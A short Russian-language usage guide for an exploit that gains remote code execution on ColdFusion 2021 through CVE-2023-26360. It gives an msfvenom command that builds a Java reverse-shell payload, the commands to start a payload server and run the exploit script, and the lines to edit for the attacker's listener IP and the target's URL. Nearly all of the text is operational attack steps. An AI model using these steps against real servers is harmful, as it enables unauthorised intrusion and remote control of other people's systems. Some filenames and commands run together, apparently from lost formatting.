
Эксплойт для удалённого выполнения кода в ColdFusion 2021 (CVE-2023-26360)
Иногда скрипты не срабатывают с первой попытки. Попробуйте несколько раз, чтобы всё заработало.
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py, поэтому его нужно инициализировать первым.python3 server.py 8000
Аргумент 8000 — это порт, который будет прослушивать сервер.
Важно отметить, что строка 12 настраивает IP-адрес сервера, поэтому измените его:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
Как и в server.py, аргумент 8000 — это порт, который будет прослушивать server.py. Поэтому он должен быть одинаковым в обеих командах.
Строка 8 в cve-2023-26360.py задаёт IP-адрес, который будет прослушивать server.py. Необходимо настроить его правильно.
Строка 11 в cve-2023-26360.py задаёт IP-адрес сервера ColdFusion, поэтому измените его:
url = "http://192.168.56.102:8500"